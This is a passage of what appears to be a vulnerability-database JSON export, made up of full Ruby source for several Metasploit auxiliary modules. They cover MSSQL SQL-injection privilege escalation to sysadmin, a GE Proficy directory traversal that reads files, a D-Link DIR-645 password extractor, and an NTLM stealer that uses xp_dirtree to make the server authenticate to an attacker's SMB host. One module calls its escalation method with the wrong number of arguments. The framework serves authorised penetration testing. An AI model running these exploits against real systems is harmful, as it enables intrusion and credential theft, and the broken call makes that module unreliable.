https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL_SQLI\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SQLi Escalate Execute AS',\n 'Description' => %q{\n This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error based SQL injection. In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n },\n 'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],\n 'License' => MSF_LICENSE,\n 'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms178640.aspx']]\n ))\n end\n\n def run\n # Get the database user name\n print_status(\"Grabbing the database user name...\")\n db_user = get_username\n if db_user.nil?\n print_error(\"Unable to grab user name...\")\n return\n else\n print_good(\"Database user: #{db_user}\")\n end\n\n # Grab sysadmin status\n print_status(\"Checking if #{db_user} is already a sysadmin...\")\n admin_status = check_sysadmin\n\n if admin_status.nil?\n print_error(\"Couldn't retrieve user status, aborting...\")\n return\n elsif admin_status == '1'\n print_error(\"#{db_user} is already a sysadmin, no escalation needed.\")\n return\n else\n print_status(\"#{db_user} is NOT a sysadmin, let's try to escalate privileges.\")\n end\n\n # Get list of users that can be impersonated\n print_status(\"Enumerating a list of users that can be impersonated...\")\n imp_user_list = check_imp_users\n if imp_user_list.nil? || imp_user_list.empty?\n print_error(\"Sorry, the current user doesnt have permissions to impersonate anyone.\")\n return\n else\n # Display list of users that can be impersonated\n print_good(\"#{imp_user_list.length} users can be impersonated:\")\n imp_user_list.each do |dbuser|\n print_status(\" #{dbuser}\")\n end\n end\n\n # Check if any of the users that can be impersonated are sysadmins\n print_status(\"Checking if any of them are sysadmins...\")\n imp_user_sysadmin = check_imp_sysadmin(imp_user_list)\n if imp_user_sysadmin.nil?\n print_error(\"Sorry, none of the users that can be impersonated are sysadmins.\")\n return\n end\n\n # Attempt to escalate to sysadmin\n print_status(\"Attempting to impersonate #{imp_user_sysadmin}...\")\n escalate_privs(imp_user_sysadmin,db_user)\n\n admin_status = check_sysadmin\n if admin_status && admin_status == '1'\n print_good(\"Success! #{db_user} is now a sysadmin!\")\n else\n print_error(\"Fail buckets, something went wrong.\")\n end\n end\n\n def get_username\n # Setup query to check for database username\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+SYSTEM_USER+'#{clue_end}')\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse result\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n user_name = $1\n else\n user_name = nil\n end\n\n user_name\n end\n\n def check_sysadmin\n # Setup query to check for sysadmin\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin'))as varchar)+'#{clue_end}')\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse result\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n status = $1\n else\n status = nil\n end\n\n status\n end\n\n def check_imp_users\n # Setup query to check for trusted databases owned by sysadmins\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n\n # Setup query\n sql = \"(select cast((SELECT DISTINCT '#{clue_start}'+b.name+'#{clue_end}'\n FROM sys.server_permissions a\n INNER JOIN sys.server_principals b\n ON a.grantor_principal_id = b.principal_id\n WHERE a.permission_name = 'IMPERSONATE' for xml path('')) as int))\"\n\n # Run query\n res = mssql_query(sql)\n\n unless res && res.body\n return nil\n end\n\n #Parse results\n parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)\n\n if parsed_result && !parsed_result.empty?\n parsed_result.flatten!\n parsed_result.uniq!\n end\n\n parsed_result\n end\n\n def check_imp_sysadmin(imp_user_list)\n # Check if the user has the db_owner role is any databases\n imp_user_list.each do |imp_user|\n # Setup query\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n\n sql = \"(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin','#{imp_user}'))as varchar)+'#{clue_end}')\"\n\n # Run query\n result = mssql_query(sql)\n\n unless result && result.body\n next\n end\n\n #Parse results\n parsed_result = result.body.scan(/#{clue_start}(.*?)#{clue_end}/m)\n\n if parsed_result && !parsed_result.empty?\n parsed_result.flatten!\n parsed_result.uniq!\n end\n\n # check if user is a sysadmin\n if parsed_result && parsed_result[0] == '1'\n print_good(\" #{imp_user} is a sysadmin!\")\n return imp_user\n else\n print_status(\" #{imp_user} is NOT a sysadmin\")\n end\n end\n\n nil\n end\n\n # Attempt to escalate privileges\n def escalate_privs(db_user)\n\n # Setup Query - Impersonate the first sysadmin user on the list\n evil_sql = \"1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--\"\n\n # Execute Query\n mssql_query(evil_sql)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb"}, {"lastseen": "2019-11-22T17:14:51", "bulletinFamily": "exploit", "description": "This module will show an image on an AppleTV device for a period of time. Some AppleTV devices are actually password-protected, in that case please set the PASSWORD datastore option. For password brute forcing, please see the module auxiliary/scanner/http/appletv_login.\n", "modified": "2017-07-24T13:26:21", "published": "2014-08-25T20:24:41", "id": "MSF:AUXILIARY/ADMIN/APPLETV/APPLETV_DISPLAY_IMAGE", "href": "", "type": "metasploit", "title": "Apple TV Image Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple TV Image Remote Control',\n 'Description' => %q(\n This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.\n ),\n 'Author' =>\n [\n '0a29406d9794e4f9b30b3c5d6702c708', # Original work\n 'sinn3r' # You can blame me for mistakes\n ],\n 'References' =>\n [\n ['URL', 'http://nto.github.io/AirPlay.html']\n ],\n 'DefaultOptions' => { 'HttpUsername' => 'AirPlay' },\n 'License' => MSF_LICENSE\n ))\n\n # Make the PASSWORD option more visible and hope the user is more aware of this option\n register_options([\n Opt::RPORT(7000),\n OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),\n OptPath.new('FILE', [true, 'Image to upload and show']),\n OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])\n ])\n\n # We're not actually using any of these against AppleTV in our Rex HTTP client init,\n # so deregister them so we don't overwhelm the user with fake options.\n deregister_options(\n 'HTTP::uri_encode_mode', 'HTTP::uri_full_url', 'HTTP::pad_method_uri_count',\n 'HTTP::pad_uri_version_count', 'HTTP::pad_method_uri_type', 'HTTP::pad_uri_version_type',\n 'HTTP::method_random_valid', 'HTTP::method_random_invalid', 'HTTP::method_random_case',\n 'HTTP::uri_dir_self_reference', 'HTTP::uri_dir_fake_relative', 'HTTP::uri_use_backslashes',\n 'HTTP::pad_fake_headers', 'HTTP::pad_fake_headers_count', 'HTTP::pad_get_params',\n 'HTTP::pad_get_params_count', 'HTTP::pad_post_params', 'HTTP::pad_post_params_count',\n 'HTTP::uri_fake_end', 'HTTP::uri_fake_params_start', 'HTTP::header_folding',\n 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'NTLM::SendLM', 'NTLM::SendNTLM',\n 'NTLM::SendSPN', 'NTLM::UseLMKey', 'DOMAIN', 'DigestAuthIIS', 'VHOST'\n )\n end\n\n\n #\n # Sends an image request to AppleTV. HttpClient isn't used because we actually need to keep\n # the connection alive so that the video can keep playing.\n #\n def send_image_request(opts)\n http = nil\n\n http = Rex::Proto::Http::Client.new(\n rhost,\n rport.to_i,\n {\n 'Msf' => framework,\n 'MsfExploit' => self\n },\n ssl,\n ssl_version,\n proxies,\n datastore['HttpUsername'],\n datastore['HttpPassword']\n )\n add_socket(http)\n\n http.set_config('agent' => datastore['UserAgent'])\n\n req = http.request_raw(opts)\n res = http.send_recv(req)\n\n Rex.sleep(datastore['TIME']) if res.code == 200\n http.close\n\n res\n end\n\n\n def get_image_data\n File.open(datastore['FILE'], 'rb') { |f| f.read(f.stat.size) }\n end\n\n\n def show_image\n image = get_image_data\n\n opts = {\n 'method' => 'PUT',\n 'uri' => '/photo',\n 'data' => image\n }\n\n res = send_image_request(opts)\n\n if !res\n print_status(\"The connection timed out\")\n elsif res.code == 200\n print_status(\"Received HTTP 200\")\n else\n print_error(\"The request failed due to an unknown reason\")\n end\n end\n\n\n def run\n print_status(\"Image request sent. Duration set: #{datastore['TIME']} seconds\")\n show_image\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/appletv/appletv_display_image.rb"}, {"lastseen": "2019-12-01T23:03:03", "bulletinFamily": "exploit", "description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.\n", "modified": "2017-07-24T13:26:21", "published": "2013-09-06T17:42:34", "id": "MSF:AUXILIARY/ADMIN/SCADA/GE_PROFICY_SUBSTITUTE_TRAVERSAL", "href": "", "type": "metasploit", "title": "GE Proficy Cimplicity WebView substitute.bcl Directory Traversal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'uri'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'GE Proficy Cimplicity WebView substitute.bcl Directory Traversal',\n 'Description' => %q{\n This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.\n },\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-0653' ],\n [ 'OSVDB', '89490' ],\n [ 'BID', '57505' ],\n [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02' ]\n ],\n 'DisclosureDate' => 'Jan 22 2013'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('TARGETURI',[true, 'Path to CimWeb', '/CimWeb']),\n OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\\\win.ini']),\n # By default gefebt.exe installed on C:\\Program Files\\GE Fanuc\\Proficy CIMPLICITY\\WebPages\\CimWeb\n OptInt.new('DEPTH', [true, 'Traversal depth', 5])\n ])\n end\n\n def normalize_uri(*strs)\n new_str = strs * \"/\"\n\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\n\n # Makes sure there's a starting slash\n unless new_str[0,1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def target_uri\n begin\n # In case TARGETURI is empty, at least we default to '/'\n u = datastore['TARGETURI']\n u = \"/\" if u.nil? or u.empty?\n URI(u)\n rescue ::URI::InvalidURIError\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\n raise Msf::OptionValidateError.new(['TARGETURI'])\n end\n end\n\n def my_basename(filename)\n return ::File.basename(filename.gsub(/\\\\/, \"/\"))\n end\n\n def is_proficy?\n connect\n req = \"GET #{normalize_uri(target_uri.path, \"index.html\")} HTTP/1.0\\r\\n\\r\\n\"\n sock.put(req)\n res = sock.get_once\n disconnect\n\n if res and res =~ /gefebt\\.exe/\n return true\n else\n return false\n end\n end\n\n # We can't use the http client msf mixin because the Proficy Web server\n # return a malformed HTTP response with the file contents, there aren't\n # two new lines (but one) between the HTTP headers and the body content.\n def read_file(file)\n travs = \"\"\n travs << \"../\" * datastore['DEPTH']\n travs << file\n\n print_status(\"#{@peer} - Retrieving file contents...\")\n\n connect\n req = \"GET #{normalize_uri(target_uri.path, \"gefebt.exe\")}?substitute.bcl+FILE=#{travs} HTTP/1.0\\r\\n\\r\\n\"\n sock.put(req)\n res = sock.get_once\n disconnect\n\n if res and res =~ /HTTP\\/1\\.0 200 OK/\n return res\n else\n return nil\n end\n\n end\n\n def run\n @peer = \"#{rhost}:#{rport}\"\n\n print_status(\"#{@peer} - Checking if it's a GE Proficy Application...\")\n if is_proficy?\n print_good(\"#{@peer} - Check successful\")\n else\n print_error(\"#{@peer} - GE proficy not found\")\n return\n end\n\n contents = read_file(datastore['FILEPATH'])\n if contents.nil?\n print_error(\"#{@peer} - File not downloaded\")\n return\n end\n\n file_name = my_basename(datastore['FILEPATH'])\n path = store_loot(\n 'ge.proficy.traversal',\n 'application/octet-stream',\n rhost,\n contents,\n file_name\n )\n print_good(\"#{rhost}:#{rport} - File saved in: #{path}\")\n\n end\nend\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb"}, {"lastseen": "2019-11-14T14:06:39", "bulletinFamily": "exploit", "description": "This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. With this vulnerability you are able to extract the password for the remote management.\n", "modified": "2017-10-09T22:06:05", "published": "2013-03-24T10:44:24", "id": "MSF:AUXILIARY/ADMIN/HTTP/DLINK_DIR_645_PASSWORD_EXTRACTOR", "href": "", "type": "metasploit", "title": "D-Link DIR 645 Password Extractor", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'D-Link DIR 645 Password Extractor',\n 'Description' => %q{\n This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.\n With this vulnerability you are able to extract the password for the remote\n management.\n },\n 'References' =>\n [\n [ 'OSVDB', '90733' ],\n [ 'BID', '58231' ],\n [ 'PACKETSTORM', '120591' ]\n ],\n 'Author' =>\n [\n 'Roberto Paleari <roberto[at]greyhats.it>', # Vulnerability discovery\n 'Michael Messner <devnull[at]s3cur1ty.de>'\t # Metasploit module\n ],\n 'License' => MSF_LICENSE\n )\n end\n\n def run\n\n vprint_status(\"#{rhost}:#{rport} - Trying to access the configuration of the device\")\n\n #Curl request:\n #curl -d SERVICES=DEVICE.ACCOUNT http://192.168.178.200/getcfg.php | egrep \"\\<name|password\"\n\n #download configuration\n begin\n res = send_request_cgi({\n 'uri' => '/getcfg.php',\n 'method' => 'POST',\n 'vars_post' =>\n {\n 'SERVICES' => 'DEVICE.ACCOUNT'\n }\n })\n\n return if res.nil?\n return if (res.headers['Server'].nil? or res.headers['Server'] !~ /DIR-645 Ver 1\\.0/)\n return if (res.code == 404)\n\n if res.body =~ /<password>(.*)<\\/password>/\n print_good(\"#{rhost}:#{rport} - credentials successfully extracted\")\n\n #store all details as loot -> there is some usefull stuff in the response\n loot = store_loot(\"dlink.dir645.config\",\"text/plain\",rhost, res.body)\n print_good(\"#{rhost}:#{rport} - Account details downloaded to: #{loot}\")\n\n res.body.each_line do |line|\n if line =~ /<name>(.*)<\\/name>/\n @user = $1\n next\n end\n if line =~ /<password>(.*)<\\/password>/\n pass = $1\n vprint_good(\"user: #{@user}\")\n vprint_good(\"pass: #{pass}\")\n\n\n connection_details = {\n module_fullname: self.fullname,\n username: @user,\n private_data: pass,\n private_type: :password,\n workspace_id: myworkspace_id,\n proof: line,\n last_attempted_at: DateTime.now, # kept in refactor may not be valid, obtained but do not attempted here\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n create_credential_and_login(connection_details)\n\n report_cred(\n ip: rhost,\n port: rport,\n service_name: 'http',\n user: @user,\n password: pass,\n proof: line\n )\n end\n end\n end\n rescue ::Rex::ConnectionError\n vprint_error(\"#{rhost}:#{rport} - Failed to connect to the web server\")\n return\n end\n\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb"}, {"lastseen": "2019-11-30T16:32:14", "bulletinFamily": "exploit", "description": "This module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the SQL injection from GET_PATH to connect to the target SQL Server instance and execute the native \"xp_dirtree\" or stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the \"PUBLIC\" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper.\n", "modified": "2019-09-23T14:29:38", "published": "2012-10-16T19:26:10", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_NTLM_STEALER_SQLI", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SQLi NTLM Stealer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL_SQLI\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SQLi NTLM Stealer',\n 'Description' => %q{\n This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" or stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.\n },\n 'Author' =>\n [\n 'nullbind <scott.sutherland[at]netspi.com>',\n 'Antti <antti.rantasaari[at]netspi.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]\n ))\n\n register_options(\n [\n OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),\n ])\n end\n\n def run\n\n # Reminder\n print_status(\"DONT FORGET to run a SMB capture or relay module!\")\n\n # Generate random file name\n rand_filename = Rex::Text.rand_text_alpha(8, bad='')\n\n # Setup query - double escaping backslashes\n sql = \"exec master..xp_dirtree '\\\\\\\\\\\\\\\\#{datastore['SMBPROXY']}\\\\#{rand_filename}'\"\n print_status(\"Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}\")\n\n # Execute query to force authentation from backend database to smbproxy\n mssql_query(sql)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb"}, {"lastseen": "2019-11-13T17:25:54", "bulletinFamily": "exploit", "description": "This module will allow for multiple SQL queries contained within a specified file to be executed against a Microsoft SQL (MSSQL) Server instance, given the appropriate credentials.\n", "modified": "2017-08-25T01:38:44", "published": "2012-07-17T13:36:02", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_SQL_FILE", "href": "", "type": "metasploit", "title": "Microsoft SQL Server Generic Query from File", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server Generic Query from File',\n 'Description' => %q{\n This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.\n },\n 'Author' => [ 'j0hn__f : <jf[at]tinternet.org.uk>' ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptPath.new('SQL_FILE', [ true, \"File containing multiple SQL queries execute (one per line)\"]),\n OptString.new('QUERY_PREFIX', [ false, \"string to append each line of the file\",\"\"]),\n OptString.new('QUERY_SUFFIX', [ false, \"string to prepend each line of the file\",\"\"])\n ])\n end\n\n\n def run\n queries = File.readlines(datastore['SQL_FILE'])\n\n prefix = datastore['QUERY_PREFIX']\n suffix = datastore['QUERY_SUFFIX']\n\n begin\n queries.each do |sql_query|\n vprint_status(\"Executing: #{sql_query}\")\n mssql_query(prefix+sql_query.chomp+suffix,true) if mssql_login_datastore\n end\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout\n print_error \"Error connecting to server: #{$!}\"\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_sql_file.rb"}]}
